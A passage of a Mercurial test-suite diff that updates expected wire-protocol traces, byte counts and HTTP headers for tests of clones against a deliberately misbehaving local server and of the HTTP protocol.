4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + write(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1227,7 +1217,7 @@ Server sends a size 0 chunked-transfer size without terminating \r\n - $ hg serve --config badserver.closeaftersendbytes=1865 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1739 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid 
> $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1243,25 +1233,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - sendall(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) 
-> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + sendall(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(3 from 5) -> (0) 0\r\n @@ -1272,25 +1257,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -27 - write(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (798) 
29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (178) 
4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -22 + write(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(3 from 5) -> (0) 0\r\n diff --git a/tests/test-http-bundle1.t b/tests/test-http-bundle1.t --- a/tests/test-http-bundle1.t +++ b/tests/test-http-bundle1.t @@ -38,7 +38,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 6 files to transfer, 606 bytes of data + 6 files to transfer, 
606 bytes of data (no-zstd !) + 6 files to transfer, 608 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found @@ -225,7 +226,8 @@ #if no-reposimplestore $ hg clone http://user:pass@localhost:$HGPORT2/ dest 2>&1 streaming all changes - 7 files to transfer, 916 bytes of data + 7 files to transfer, 916 bytes of data (no-zstd !) + 7 files to transfer, 919 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found diff --git a/tests/test-http-protocol.t b/tests/test-http-protocol.t --- a/tests/test-http-protocol.t +++ b/tests/test-http-protocol.t @@ -1,8 +1,13 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test +so disable it. + $ . $TESTDIR/wireprotohelpers.sh $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [web] > push_ssl = false > allow_push = * @@ -321,7 +326,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequi
red\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending heads command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/heads HTTP/1.1\r\n @@ -437,7 +442,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -474,7 +479,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -745,7 +750,7 